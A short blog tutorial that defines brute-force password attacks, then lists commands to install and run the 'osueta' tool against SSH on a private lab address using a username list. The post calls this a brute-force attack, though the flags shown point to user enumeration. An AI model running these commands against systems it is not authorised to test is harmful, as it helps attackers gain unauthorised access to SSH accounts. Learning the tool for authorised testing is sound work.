A brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
Install pre requests
apt-get install python-ipy python-nmap python-paramiko
Getting osueta repo clone
git clone https://github.com/c0r3dump3d/osueta.git
Create username file
Create txt file with sample of user names in osueta directory (vi username.txt)
Generate brute force attack
Now send sample brute force attack from 'osueta'
./osueta.py -H 192.168.1.4 -p 22 -d 15 -v dos no -L username.txt
No comments:
Post a Comment